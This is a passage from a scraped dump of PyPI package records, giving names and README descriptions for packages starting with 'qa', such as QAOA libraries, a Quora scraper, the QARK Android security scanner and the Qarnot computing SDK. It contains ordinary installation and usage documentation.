docs.Notice that you need to specify which word in the sentence is the predicate, about which the question will interrogate. By default, you should precede the predicate with thesymbol, but you can also specify your own predicate marker:pipe(\"The student was interested in Luke 's research about see animals .\",verb_form=\"research\",predicate_type=\"nominal\",predicate_marker=\"\")In addition, you can specify additional kwargs for controling the model's decoding algorithm:pipe(\"The student was interested in Luke 's research about see animals .\",verb_form=\"research\",predicate_type=\"nominal\",num_beams=3)Cite@inproceedings{klein2020qanom,\n title={QANom: Question-Answer driven SRL for Nominalizations},\n author={Klein, Ayal and Mamou, Jonathan and Pyatkin, Valentina and Stepanov, Daniela and He, Hangfeng and Roth, Dan and Zettlemoyer, Luke and Dagan, Ido},\n booktitle={Proceedings of the 28th International Conference on Computational Linguistics},\n pages={3069--3083},\n year={2020}}"} +{"package": "qanotify", "pacakge-description": "QA notify"} +{"package": "qanpdf", "pacakge-description": "This is the homepage of ouir project."} +{"package": "qante", "pacakge-description": "MotivationExtracting the highly-valuable data from unstructured text often\nresults in hard-to-read, brittle, difficult-to-maintain code.\nThe problem is that using regular expressions directly embedded\nin the program control flow does not provide the best level of\nabstraction. 
We propose a query language (based on the tuple\nrelational calculus) that facilitates data extraction.\nDevelopers can explicitly express their intent declaratively,\nmaking their code much easier to write, read, and maintain.SolutionThis package allows programmers to express what they are searching\nfor by using higher-level concepts to express their query as tags,\nlocations, and expressions on location relations.Thelocationof a string of characters within the document is\nthe interval defining its starting and ending position.Locations are grouped into sets named bytags. Tags can be\nused in conjunctions and disjunctions of interval relations to\nquery for tuples of locations.DocumentationWe invite you to view our YouTubevideoof ourpresentationfrom thePlaylistforPyData Global 2022.We presented this material from ourGitHubrepo:pydataG22.pdfslides of our talk.ipynb/pydata.ipynbajupyter notebookwith examples.RELEASE_NOTES.rstdescribes updates for each release.Use one of these pip or python commands (rev 3 or above) to install fromPyPI:pip install qante\npython -m pip install qanteUse python docstrings for API Documentation:python # rev 3 or above\n from quante.tagger import Tagger\n from quante.query import Query\n from quante import loctuple as lt\n from quant.table import get_table\n\n help(Tagger) # annotate text with tags using tagRE('tagname', regexp)\n help(Query) # Syntax for querying annotated text\n help(lt) # Predicates used by queries\n help(get_table) # extract table (as dictionaries) from textSee also: \u201cAPI Documentation\u201d at the end of our jupyter notebook.We welcome your questions by electronic mail at: qante{at}asgard.com"} +{"package": "qanty", "pacakge-description": "qantyPython package for integration of Qanty in other applicationsSupported Python VersionsThis library supports the following Python implementations:Python 3.8Python 3.9Python 3.10Python 3.11InstallationInstall from PyPi usingpip, a\npackage manager for Python.pip3installqantyTest your installationTry listing your company branches. Save the following code sample to your computer with a text editor. 
Be sure to update theauth_token, andcompany_idvariables.fromqantyimportQanty# Your Auth Tokenclient=Qanty(auth_token=\"your_auth_token\",company_id=\"your_company_id\")branches=client.get_branches()forbranchinbranches:print(f\"Branch ID{branch.id}, name{branch.name}\")"} +{"package": "qany", "pacakge-description": "introsuppose you want to make a comand line tool called qany.\nit accept integer as numbers\nouput carrots we need to feedex:\n\tcmd> qany 2 \n\touput: 4we can get the output by two ways:command lineqany2call python moudlepython-mqany2best practice schemaenvGenerated bymake envThis is first step you need to do in any python projectit will create a virtual envauto source itinstall requirements for the start uptestrunmake testrunmake runwill run in module modemake mainwill run in normal modeYou can see thatmain.pyandqany/__main__.pyare the same content file.why do we needmain.py?\nIt is eay to make an entry in IDE , like intellij.Could I just use__main__.pyto run like this?pythonqany/__main__.pyYou cound not.That is because the top-level package problem.Ex:python main.py \ntop-level package is the same as main.py\n\npython src/func/main.py \ntop-level package is the same as main.py, aka func \ntop-level package is the folder where you run this command fromSo , whyqany/__main__.pydoes not work?because top-level package is qany now.loggingAlways use logging for log print,dont useprintlogging config is controlled bylogging.yml, which can control every module level callsetup_logging` in main file (ra)make moduleupdate readmeput moudle in the folder parallel with logx folder.logxyour_modulepacking module or cmdlocalfor quick test purposeinstall:pip install .uninstall:pip uninstall make install\nmake uninstallupload to test or prod PYPI serverupload to test server:make upload-to-testupload to prod server:make upload-to-prodtest and coveragepure testmake testtest with coveragemake coverage"} +{"package": "qaoa", "pacakge-description": "QAOAThis package is a flexible python implementation of theQuantum Approximate Optimization Algorithm/Quantum Alternating Operator ansatz(QAOA)aimed at researchersto readily test the performance of a new ansatz, a new classical optimizers, etc. By default it uses qiskit as a backend.Install withpip install qaoaorpip install -e ..BackgroundGiven acost function$$c: \\lbrace 0, 1\\rbrace^n \\rightarrow \\mathbb{R}$$\none defines aproblem Hamiltonian$H_P$ through the action on computational basis states via$$ H_P |x\\rangle = c(x) |x\\rangle,$$which means that ground states minimize the cost function $c$.\nGiven a parametrized ansatz $ | \\gamma, \\beta \\rangle$, a classical optimizer is used to minimize the energy$$ \\langle \\gamma, \\beta | H_P | \\gamma, \\beta \\rangle.$$QAOA of depth $p$ consist of the followingansatz:$$ |\\gamma, \\beta \\rangle = \\prod_{l=1}^p \\left( U_M(\\beta_l) U_P(\\gamma_l)\\right) | s\\rangle, $$where$U_P$ is a family ofphase-separating operators,$U_M$ is a family ofmixingoperators, and$|s\\rangle$ is a \"simple\"initialstate.In plain vanilla QAOA these have the form\n$U_M(\\beta_l)=e^{-i\\beta_l X^{\\otimes n}}$, $U_P(\\gamma_l)=e^{-i\\gamma_l H_P}$, and the uniform superposition $| s \\rangle = |+\\rangle^{\\otimes n}$ as initial state.Create a custom ansatzIn order to create a custom QAOA ansatz, one needs to specify aproblem, amixer, and aninitial state. These base classes have an abstract methoddef create_circuit:which needs to be implemented. 
The problem base class additionally has an abstract methoddef cost:.This library already contains several standard implementations.The followingproblemcases are already available:MaxCutQUBOExact coverPortfolioThe followingmixercases are already available:X-mixerXY-mixerGrover-mixerThe followinginitial statecases are already available:PlusStatevectorDickeIt isvery easy to extend this listby providing an implementation of a circuit/cost of the base classes mentioned above. Feel free to fork the repo and create a pull request :-)To make an ansatz for the MaxCut problem, the X-mixer and the initial state $|+\\rangle^{\\otimes n}$ one can create an instance like this:qaoa = QAOA(\n\tinitialstate=initialstates.Plus(),\n\tproblem=problems.MaxCut(G=\"some networkx instance\"),\n\tmixer=mixers.X()\n)Run optimization at depth $p$For depth $p=1$ the expectation value can be sampled on an $n\\times m$ Cartesian grid over the domain $[0,\\gamma_\\text{max}]\\times[0,\\beta_\\text{max}]$ with:qaoa.sample_cost_landscape()Sampling high-dimensional target functions quickly becomes intractable for depth $p>1$. We thereforeiteratively increase the depth. At each depth alocal optimizationalgorithm, e.g. COBYLA, is used to find a local minimum. Asinitial guessthe following is used:At depth $p=1$ initial parameters $(\\gamma, \\beta)$ are given by the lowest value of the sampled cost landscape.At depth $p>1$ initial parameters $(\\gamma, \\beta)$ are based on aninterpolation-based heuristicof the optimal values at the previous depth.Running this iterative local optimization to depth $p$ can be done by the following call:qaoa.optimize(depth=p)The function will callsample_cost_landscapeif not already done, before iteratively increasing the depth.Further parametersQAOA supports the following keywords:qaoa = QAOA( ...,\n\tbackend= ,\n\tnoisemodel= ,\n\toptimizer= ,\n\tprecision= ,\n\tshots= ,\n\talpha=\n)backend: the backend to be used, defaults toAer.get_backend(\"qasm_simulator\")noisemodel: the noise model to be used, default toNone,optimizer: a list of the optimizer to be used from qiskit-algorithms together with options, defaults to[COBYLA, {}],precision: sampel until a certain precision of the expectation value is reached based on $\\text{error}=\\frac{\\text{variance}}{\\sqrt{\\text{shots}}}$, defaults toNone,shots: number of shots to be used, defaults to1024,alpha: the value forconditional value at risk (CVAR), defaults to1, which are the standard moments.Extract resultsOnceqaoa.optimize(depth=p)is run, one can extract, the expectation value, variance, and parametres for each depth $1\\leq i \\leq p$ by respectively calling:qaoa.get_Exp(depth=i)\nqaoa.get_Var(depth=i)\nqaoa.get_gamma(depth=i)\nqaoa.get_beta(depth=i)Additionally, for each depth every time the loss function is called, theangles, expectation value, variance, maximum cost, minimum cost,andnumber of shotsare stored inqaoa.optimization_results[i]Example usageSeeexamples here."} +{"package": "qaoalib", "pacakge-description": "qaoalibA package for QAOA Max-cut Calculations.Packages required:numpynetworkxmatplotlibqiskitHow to installYou can install from the PyPI:pip install --upgrade qaoalibUsageCalculate Max-cut expectation withQmcorQmcFastKron(faster version):import networkx as nx\nfrom qaoalib.qaoa import Qmc, QmcFastKron\n\nG = nx.fast_gnp_random_graph(10, 0.5) # Random graph with 10 nodes\nparams = [0.2, 0.4, 0.3, 0.5] # 4 params, depth = 2\n\nqmc = Qmc(G, params) # or QmcFastKron(G, params)\nqmc.run()\nprint(qmc.expectation)Plot landscapes of 
the QAOA Max-cut expectation function:import networkx as nx\nfrom qaoalib.qaoa.landscape import HybridFast\n\nG = nx.fast_gnp_random_graph(10, 0.5)\nprev_params = [0.1, 0.2] # previous parameters (gamma1, beta1)\n\nins = HybridFast(G, prev_params) # plots the landscape wrt gamma2 and beta2 with previous parameters given.\nins.create_grid()\nins.show_landscape()"} +{"package": "qaoa-quimb", "pacakge-description": "QAOA-QUIMBThis librairy implements an optimized version of the Quantum Approximate Optimization Algorithm (QAOA) and various extensions with Quimb.InstallationTo install with pip:pip install qaoa_quimbReferencesGray, J. (2018). quimb: a python library for quantum information and many-body calculations. Journal of Open Source Software, 3(29), 819. doi:10.21105/joss.00819."} +{"package": "qaoverpapers", "pacakge-description": "No description available on PyPI."} +{"package": "qap", "pacakge-description": "UNKNOWN"} +{"package": "qapGA", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapGAr", "pacakge-description": "This is a genetic algorithm library for quadratic assignment problem.Change Log0.0.1 (2022.05.15)"} +{"package": "qapi", "pacakge-description": "QAPIA API query language."} +{"package": "qapi-sdk", "pacakge-description": "QAPI SDKQAPI SDK provides a library of classes for working with Query API in your Python code.RequirementsPython 3.6+Must be logged into the private VPN.Installationpipinstallqapi-sdkEnvironment VariablesQAPI_URL: QAPI Base URL.EMAIL: Your EmailOptional: If you choose to add your AWS credentials, you can use theread_columnsmethod to read in the\nheaders of your CSV file automatically.AWS_ACCESS_KEY_ID: AWS Access Key IDAWS_SECRET_ACCESS_KEY: AWS Secret Access KeyAWS_DEFAULT_REGION: AWS Default RegionExamplesQueryFEED ID: The table must exist in Athena.QUERY ID: The query id is used as an identifier for the query. Query id must be unique. Once you have retrieved your\ndata from S3 it is advised to delete the query.SQL: The SQL query to be executed.importtimefromdotenvimportload_dotenvfromqapi_sdkimportQueryload_dotenv()# Step 1: Assign your FEED ID, QUERY ID, and SQL QUERYfeed_id=\"[FEED/TABLE NAME]\"query_id=\"[QUERY NAME]\"query=f\"SELECT * FROM{feed_id}\"# Step 2: Create a Query objectmy_query=Query(feed_id=feed_id,query_id=query_id)# Step 3: Execute the query pushmy_query.push_query(sql=query)# Step 4: Wait for the query to completewhilemy_query.query_status():print(\"Waiting for query to complete...\")time.sleep(10)# Step 5 (Optional): Delete the querymy_query.delete_query()FeedFEED ID: The table name you want to create in Athena.PUSH ID: The push id is used as an identifier for the query. 
Push id must be unique.COLUMNS: The name of the columns that will be pushed to Athena.importtimefromdotenvimportload_dotenvfromqapi_sdkimportFeedload_dotenv()# Step 1: Assign your FEED ID, PUSH ID, and COLUMNSfeed_id=\"[FEED/TABLE NAME]\"push_id=\"[PUSH ID/PUSH NAME]\"# Step 2: Create a Feed objectmy_feed=Feed(feed_id=feed_id,push_id=push_id)# Step 3: You can manually assign the columnscolumns=[{\"name\":\"email\",\"type\":\"string\"},{\"name\":\"md5email\",\"type\":\"string\"},{\"name\":\"firstname\",\"type\":\"string\"}]# Step 3a (Optional): If you added AWS credentials, you can use the `read_columns` method to read# in the headers of your CSV file automatically.columns=my_feed.read_columns(data_bucket=\"[DATA BUCKET]\",data_key=\"path/to/your/data/dir/ OR path/to/your/data/file.csv\",delimiter=\",\")# Step 4: Define where to grab the data and format of the data.Then push the data to Athena.my_feed.push_feed(pull_path_bucket=\"[DATA BUCKET]\",pull_path_key=\"path/to/your/data/dir OR path/to/your/data/file.csv\",columns=columns,separator=\",\")# Step 5: Wait for the push to completewhilemy_feed.push_status():print(\"Waiting for push to complete...\")time.sleep(10)# Step 6 (Optional): Delete the pushmy_feed.delete_push()# Step 7 (Optional): Delete the feedmy_feed.delete_feed()RedshiftFEED ID: You must use an existing feed.QUERY ID: The query id is used as an identifier for the query. Query id must be unique. Once you have retrieved your\ndata from S3 it is advised to delete the query.SQL: The SQL query to be executed.If you query an Athena table from Redshift, you must append the Athena schema to the table name.For example:SELECT * FROM [query_api].[TABLE NAME]If you use aLIMITclause, you must wrap the query in aSELECT * FROM ()clause.For example:SELECT * FROM (SELECT * FROM [TABLE NAME] LIMIT 100)importtimefromdotenvimportload_dotenvfromqapi_sdkimportRedshiftload_dotenv()# Step 1: Assign your FEED ID, QUERY ID, and SQL QUERYfeed_id=\"[EXISTING FEED ID]\"query_id=\"[QUERY NAME]\"query=\"SELECT * FROM (SELECT * FROM [SCHEMA].[TABLE NAME] LIMIT 10)\"# Step 2: Create a Redshift objectmy_query=Redshift(feed_id=feed_id,query_id=query_id)# Step 3: Execute the query pushmy_query.push_query(sql=query)# Step 4: Wait for the query to completewhilemy_query.query_status():print(\"Waiting for query to complete...\")time.sleep(10)# Step 5 (Optional): Delete the querymy_query.delete_query()CHANGELOG[0.3.4] - 2020-06-02UpdatedREADME.mdto inform the user they can push a directory of files with thepush_feedmethod or push a single\nfile with thepush_feedmethod.UpdatedREADME.mdto inform the user they can use theread_columnsmethod to read in the headers of your CSV\nfile from a directory or a single file automatically.Changed theread_columnsparameterdata_key_dirtodata_key. 
This is to make it consistent with the other\nmethods.Changed the order of operations steps in theREADME.mdfile to make it easier to follow.[0.3.3] - 2020-06-01Updated package to include Python 3.6+[0.3.2] - 2020-05-30UpdatedREADME.md[0.3.0] - 2020-05-30AddedRedshiftobject to the SDK.Addeddelete_querymethod to Redshift class.Addedquery_statusmethod to Redshift class.Addedpush_querymethod to Redshift class.UpdatedREADME.md[0.2.1] - 2020-05-30Addedhomepageandrepositorylinks to thepyproject.tomlfile.[0.2.0] - 2020-05-29AddedFEEDobject to the SDK.Addedread_columnsmethod to Feed class.Addeddelete_pushmethod to Feed class.Addeddelete_feedmethod to Feed class.Addedpush_statusmethod to Feed class.Addedpush_feedmethod to Feed class.UpdatedREADME.md[0.1.4] - 2022-05-29AddedQUERYobject to the SDK.Addeddelete_querymethod to Query class.Addedquery_statusmethod to Query class.Addedpush_querymethod to Query class.Added theCHANGELOGsection.UpdatedREADME.md"} +{"package": "qapla", "pacakge-description": "No description available on PyPI."} +{"package": "qapR", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapRu", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapRutaB", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qapy", "pacakge-description": "https://github.com/matt-charr/qa-demo/blob/master/README.md"} +{"package": "qaqa2121q", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qaqc", "pacakge-description": "QaQcProject is WIP.See alsoSaQCwhich gave some major ideas for this project."} +{"package": "qaquora", "pacakge-description": "Quora-ScraperThis package will allow you to scrap all Questions-Answers related to any topic e.g. 
mathematics-and-physics,coronavirus etc from Quora.It includes two functions for now-quora_scrap(self,keyword,PATH)arguments-keyword- keyword is an argument which describes your topic for e.g coronavirus,coronavirusinindia etc.PATH- to define path of chromedriver.exe filereturn-questions- questions scrapped for keywordanswers- answers scrapped for each questionfinal_qa_dict- dictionary of scrapped questions-answerssave_to_csv(self,filename,questions,final_question_answer_pairs_quora_dict)arguments-filename- specify name of your csv filequestions- questions returned by function 'quora_scrap'final_question_answer_pairs_quora_dict- specifies question-answer dictionary returned by function 'quora_scrap'If anyone wants to contribute in this project,feel free to do."} +{"package": "qarbon", "pacakge-description": "qarbon is a python library for Qt widgets."} +{"package": "qArchSearch", "pacakge-description": "No description available on PyPI."} +{"package": "qarealtime-collector", "pacakge-description": "QARealtimeCollector: QUANTAXIS REALTIME MARKETDATA COLLECTORS"} +{"package": "qarg", "pacakge-description": "quick argument parsingA simple concise way of defining arguments for an argparse.ArgumentParser-- Syntax --comma seperated list of argsargs:({[=@#$all but short name are optionalif long name is missing, short name will be usedif long name is missing, and short name has len > 1long name will be short name and short name will be thefirst character of short nameexamples:f(foo)[int]=10f[int]=10supported add_argument optionsname or flags (short name & long name)action = '@'nargs = '#'const = '$'default = '='type = '['choices = not supportedrequired = '!'help = not supportedmetavar = not supporteddest = '{'-- Example --import qargns = qarg.get('f(foo[int=1,r(bar,baz[str,p(pop@store_true')"} +{"package": "qark", "pacakge-description": "Quick Android Review KitThis tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs. The tool is also capable of creating \u201cProof-of-Concept\u201d deployable APKs and/or ADB commands, capable of exploiting many of the vulnerabilities it finds. There is no need to root the test device, as this tool focuses on vulnerabilities that can be exploited under otherwise secure conditions.RequirementsTested on Python 2.7.13 and 3.6\nTested on OSX, Linux, and WindowsUsageFor more options please see the--helpcommand.APK:~ qark --apk path/to/my.apkJava source code files:~ qark --java path/to/parent/java/folder\n~ qark --java path/to/specific/java/file.javaResultsA report is generated in JSON and can be built into other format types, to change the report type please use the--report-typeflag.InstallationWith pip (no security checks on requirements):~ pip install --user qark # --user is only needed if not using a virtualenv\n~ qark --helpWithrequirements.txt(security checks on requirements):~ git clone https://github.com/linkedin/qark\n~ cd qark\n~ pip install -r requirements.txt\n~ pip install . --user # --user is only needed if not using a virtualenv\n~ qark --helpExploit APKQARK can generate a basic exploit APK for a few of the vulnerabilities that have been found.To generate the exploit APK there are a few steps to follow. 
You need to have the Android SDK v21 and build-tools v21.1.2Install the android SDK, you can get it under the \u2018command line tools\u2019:https://developer.android.com/studio/#downloadsUnzip the android SDKGo into the new directory and generate the licenses withbin/sdkmanager \u2013licensesMake sure the generated licenses are in the android SDK directory.Install the SDK and the proper build-tools version:bin/sdkmanager \u2013install \u201cplatforms;android-21\u201d \u201csources;android-21\u201d \u201cbuild-tools;21.1.2\u201dChecksQARK is an easy to use tool capable of finding common security vulnerabilities in Android applications. Unlike commercial products, it is 100% free to use. QARK features educational information allowing security reviewers to locate precise, in-depth explanations of the vulnerabilities. QARK automates the use of multiple decompilers, leveraging their combined outputs, to produce superior results, when decompiling APKs. Finally, the major advantage QARK has over traditional tools, that just point you to possible vulnerabilities, is that it can produce ADB commands, or even fully functional APKs, that turn hypothetical vulnerabilities into working \u201cPOC\u201d exploits.Included in the types of security vulnerabilities this tool attempts to find are:Inadvertently exported componentsImproperly protected exported componentsIntents which are vulnerable to interception or eavesdroppingImproper x.509 certificate validationCreation of world-readable or world-writeable filesActivities which may leak dataThe use of Sticky IntentsInsecurely created Pending IntentsSending of insecure Broadcast IntentsPrivate keys embedded in the sourceWeak or improper cryptography usePotentially exploitable WebView configurationsExported Preference ActivitiesTapjackingApps which enable backupsApps which are debuggableApps supporting outdated API versions, with known vulnerabilitiesNoticeNote: QARK decompiles Android applications back to raw source code. Please do not use this tool if this may be considered illegal in your juristdiction. If you are unsure, seek legal counsel.If you run into issues on OSX, especially relating to the outbound call to the Play Store, or the downloading of the SDK, it is\nlikely due to your Python/OpenSSL configuration and the fact that recent changes in OSX impacted Python installed via brew. Nuking your\nPython installation(s) and re-installing from source may fix your issues.LicenseCopyright 2015 LinkedIn Corp. All rights reserved.Copyright 2015 LinkedIn Corp. 
Licensed under the Apache License, Version 2.0 (the \u201cLicense\u201d); you may not use this file except in compliance with the License.You may obtain a copy of the Licensehere.\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \u201cAS IS\u201d BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied."} +{"package": "qarl", "pacakge-description": "QARLQemu Automation that is Really Light-weight."} +{"package": "qarnot", "pacakge-description": "Qarnot computing Python SDKThis package allows you to use Qarnot cloud computing service.You can launch, manage and monitor payloads running on distributed computing nodes deployed in Qarnot\u2019sdigital boilers.Basic usageCreate an account, retrieve your token and get free computation time onaccount.qarnot.comLaunch a docker container in 7 lines:importqarnotconn=qarnot.connection.Connection(client_token=\"xxxx_mytoken_xxxx\")task=conn.create_task('hello world','docker-batch',4)task.constants['DOCKER_CMD']='echo hello world from node #${FRAME_ID}!'task.run()print(task.stdout())Samples and documentationsYou can find samples and detailed information onqarnot.com.SDK documentation is availablehereGenerating documentationTo generate the SDK documentation you can use the following commandmake-CdochtmlThe index of the doc is then generated indoc/_build/html/index.html"} +{"package": "qarray", "pacakge-description": "No description available on PyPI."} +{"package": "qarrayrun", "pacakge-description": "A helper tool for running array jobs on an HPC computational node.The qarrayrun package was developed by the United States Food\nand Drug Administration, Center for Food Safety and Applied Nutrition.This script executes a single slot of an array job on an HPC compute node.\nIt is intended to be used with Sun Grid Engine, SLURM, or Torque job schedulers.\nIt assumes every instance of the job array runs the same command but with\ndifferent arguments. 
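To make the array-slot pattern concrete, here is a rough sketch of the idea only (not qarrayrun's actual command line or API): under Sun Grid Engine each slot of an array job receives its index in the SGE_TASK_ID environment variable, so a slot can pick out its own line of a parameter file and run the shared command with those arguments, roughly:
import os
import subprocess
slot = int(os.environ['SGE_TASK_ID'])    # SGE numbers array slots starting at 1
with open('parameters.txt') as fh:       # hypothetical file: one line of arguments per slot
    args = fh.readlines()[slot - 1].split()
subprocess.run(['my_command'] + args)    # same command for every slot, different arguments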
This script performs the work of looking-up the\narguments in a text file and substituting those arguments into the command\nto be executed.Free softwareDocumentation:https://qarrayrun.readthedocs.ioSource Code:https://github.com/CFSAN-Biostatistics/qarrayrunPyPI Distribution:https://pypi.python.org/pypi/qarrayrunFeaturesExecutes a single slot of an array job on an HPC compute nodeSimple parameter lookup languageSupports execution in a subshell when neededCiting qarrayrunTo cite qarrayrun, please reference the qarrayrun GitHub repository:https://github.com/CFSAN-Biostatistics/qarrayrunLicenseSee the LICENSE file included in the qarrayrun distribution.History1.1.0 (2020-04-28)Update command line help to mention SLURM support.1.0.1 (2018-12-11)Fix the text in usage example.1.0.0 (2018-11-29)First public release."} +{"package": "qarray-rust-core", "pacakge-description": "qarray-rust-coreQuantum Dot Constant Capacitance Simulatoris a high-performance Python package that leverages the power of Rust and Rayon to provide a fully parallelised and optimised simulation environment for quantum dots with constant capacitance.This package provides core functionality; it is not intended that the user will interact with it directly.FeaturesUltra-fast Simulation:Harnesses the speed of Rust and the parallelism of Rayon to deliver lightning-fast simulations.Constant Capacitance:Specialized for simulating quantum dots with constant capacitance, allowing precise modelling of charge dynamics.User-Friendly:Designed with ease of use in mind, making it accessible to both experts and newcomers in quantum dot simulations.Extensive Documentation:Comprehensive documentation and examples to help you get started quickly.InstallationInstall Quantum Dot Constant Capacitance Simulator using pip:pipinstallqarray-rust-coreUsageThis package exposes two functions to be called from python:ground_state_open- computes the lowest energy state of a quantum dot array with constant capacitance and which is open, such that the total number of changes is not fixed.ground_state_closed- computes the lowest energy state of a quantum dot array with constant capacitance and which is closed, such that the total number of changes is fixed.The python code to call these functions is as follows:fromqarray-rust-coreimport(ground_state_open,ground_state_closed)importnumpyasnp# the dot-dot capacitance matrixcdd=np.array([[1,-0.1],[-0.1,1]])cdd_inv=np.linalg.inv(cdd)# the dot-gate capacitance matrixcgd=np.array([[1,0.3],[0.3,1]])# define a matrix of gate voltages to sweep over the first gatevg=np.stack([np.linspace(-1,1,100),np.zeros(100)],axis=-1)n_charge=3# the number of changes to confine in the quantum dot array for the closed casethreshold=1# threshold to avoid having to consider all possible charge states, setting it 1 is always correct, however has a computatinal cost.n_open=ground_state_open(vg,cgd,cdd_inv,threshold)n_closed=ground_state_closed(vg,n_charge,cgd,cdd,cdd_inv,threshold)It is not intended the user ever call these functions directly.There is a pure Python wrapper that provides a more user-friendly interface to this core functionality.\nSeeQuantum Dot Constant Capacitance Simulator. 
This package provides:A user-friendly interfaceto the core functionality.Plotting, charge sensing, virtual gateand gate voltage sweeping (1d and 2d) functionality.Advanced type checkingusing pydantic.Automated testingincluding for the functionality in this package.More examples."} +{"package": "qary", "pacakge-description": "qaryTheqarypackage is both a chatbot framework and a virtual assistant that actually assists!\nMost bots manipulate you to make money for their corporate masters. With qary, you can buildyourbot to protect you and amplify your prosocial intelligence.We started work onqaryas part of 1st editition ofNLP in Action.\nIt has slowly grown into the core framework for a social-impact startupTangible AI.\nTangible AIinterns and volunteersare constantly fixing bugs, adding new features and dialog trees to qary's repetoire.\nTheSan Diego Python User Groupmeetups have been the scene forsome fun qary demos.\nTheSan Diego Machine Learning Book Clubis a great place for support on advanced concepts in theNLP in Actionbook or anything NLP and machine learning related.\nYou can find more ideas indocs/.InstallInstall from sourceRetrieve the source code from GitLab using a bash console:gitclonegit@gitlab.com:tangibleai/qarycdqaryIf that doesn't work or you don't know what a bash console is, then you probably want to start with theWindows UsersInstructions here:docs/README-windows-install.mdMake sure you installqaryin avirtual environmentusing the latest version ofpipand the pythonvirtualenvpackage:pipinstall--upgradepipvirtualenv\npython-mvirtualenvvenvsourcevenv/bin/activateNow that you have your environment activated, make sure you are in theqary/repository along side the pyproject.toml file so you can install qary in developer (editable) mode:pipinstall--editable.Now you're ready to runqaryfrom the command line (bash console):qary\"Hi!\"PyPi packageqaryis onPyPibut this install is unlikely to work, unless you've already installed all the dependencies:pipinstallqaryUsage$qary--help\nusage:qary[-h][--version][--nameSTR][-p][-sSTR][-v][-vv][words[words...]]Runningqaryfor just one skill$qary-sqa# ... (logging messages)YOU:WhenwasBarackObamaborn?# ... (logging messages)qary:August4,1961qaryskillsqary's probabilistic conversation manager chooses a reply from the possiblities generated by the different personalities:pattern(skills/pattern.py): example skill using regex patterns to reply to greetings like \"hi\"qa(skills/qa.py): BERT and ALBERT Wikipedia Question Answering (WikiQA reading comprehension tests)faq(skills/faq.py): answers to frequently asked questions using data/faq/*.ymlglossary(skills/glossary.py): definitions from glossary yml files in data/faq/glossary-*.ymleliza(eliza.py): a python port of the ELIZA therapist botConfiguring default personalitiesBy default,qaryruns withqapersonality. 
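As an illustration (assuming the -s flag accepts any of the skill names listed above, which the usage text does not spell out, so treat the exact value as an assumption), a command like qary -s eliza 'I have been feeling a bit down lately' would start the bundled ELIZA port instead of the default question-answering skill.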
Check out the config file inqary.inito change the default skills loaded for your own custom skill in the skills directory.Approachqary's chatbot framework allows you to combine many approaches to give you state-of-the-art capability to answer questions and carry on a conversation:search:chatterbot,willpattern matching and response templates: Alexa,AIMLgenerative deep learning:robot-bernie,movie-botgrounding:snipsIt's all explained in detail atNLP in Action.Presentations for San Diego Python User Group are in [docs/](/docs/2019-08-22--San Diego Python User Group -- How to Build a Chatbot.odp) and on the web athttp://totalgood.org/midata/talksContributing pattern for developersDM @hobs on SD PUG'sdiscord serverif you'd like to join us for weekly collaborative-coding sessions onqaryand other open source projects.Create a forkof themain qary repositoryon Gitlab.Make your changes in a branch named something different frommaster, e.g. create\na new branchmy-pull-request.Create a merge request.Help your fellow contributors out by:Follow thePEP-8 style guide.Try to include a docstring, at least a single line, in any function, method, or classBonus points for adding adoctestas part of your contribution.If you add a new feature, write some quick docs in the README.Add your name and attribution to the AUTHORS file.Know we are grateful for your contribution! You've made the chatbot world a little better!"} +{"package": "qas", "pacakge-description": "Example ProjectA general, concurrent and extensible functional testing framework.Read more.InstallingpipinstallqasUsagegitclonehttps://github.com/hatlonely/qas.gitcdqasqas-tops/example-docs/helloworld"} +{"package": "qasdad", "pacakge-description": "QASDAD, the quick and simple data analysis and documentation program.QASDAD is intended to speed up and simplify the process of analysing the data of\nphysical experiments and documenting it and make that process less error prone.\nYou can find examples that are intended to show the capabilities of QASDAD in the \u201cexamples\u201d directory.\nYou can find a german tutorial in the \u201cgerman tutorial\u201d directory.\nYou can find the documentation in the \u201cdocu\u201d directory.\n\u201cdocu/latex/refman.pdf\u201d is the documentation in pdf-format.\nYou should note that QASDAD is still under development, super buggy and not\nfeature complete, but feel free to contact me for bug reports and feature\nrequests atvolker.weissmann@gmx.de.\nThe public API is not stable\nyet, so feel free to propose API changes.QASDAD is written by Volker Wei\u00dfmann, a German physics student at the University\nof Stuttgart.\nFor licensing issues, bug reports, feature requests etc.\ncontact me atvolker.weissmann@gmx.de.\nThis program is free software (free as in freedom)\nand you can find the full license of this program in LICENSE.TXT\nThe direct dependencies of QASDAD are\n* Python 3 (https://www.python.org, not included, needs to be installed separately)\n* Scipy (https://www.scipy.org, not included, needs to be installed separately)\n* Numpy (http://www.numpy.org, not included, needs to be installed separately)\n* Matplotlib (https://matplotlib.org/, not included, needs to be installed separately)\n* Sympy (https://www.sympy.org, not included, needs to be installed separately)\n* latex2sympy (https://gitlab.com/volkerweissmann/latex2sympy, not included, needs to be installed separately)You can also install QASDAD using python3 -m pip install qasdadpGood Luck.QASDAD, the quick and simple data analysis and documentation 
program\nCopyright (C) 2018 Volker Wei\u00dfmann . Contact:volker.weissmann@gmx.deThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Affero General Public License as\npublished by the Free Software Foundation, either version 3 of the\nLicense, or (at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Affero General Public License for more details.You should have received a copy of the GNU Affero General Public License\nalong with this program. If not, see ."} +{"package": "qasdadp", "pacakge-description": "QASDAD, the quick and simple data analysis and documentation program.QASDAD is intended to speed up and simplify the process of analysing the data of\nphysical experiments and documenting it and make that process less error prone.\nYou can find examples that are intended to show the capabilities of QASDAD in the \"examples\" directory.\nYou can find a german tutorial in the \"german tutorial\" directory.\nYou can find the documentation in the \"docu\" directory.\n\"docu/latex/refman.pdf\" is the documentation in pdf-format.\nYou should note that QASDAD is still under development, super buggy and not\nfeature complete, but feel free to contact me for bug reports and feature\nrequests atvolker.weissmann@gmx.de.\nThe public API is not stable\nyet, so feel free to propose API 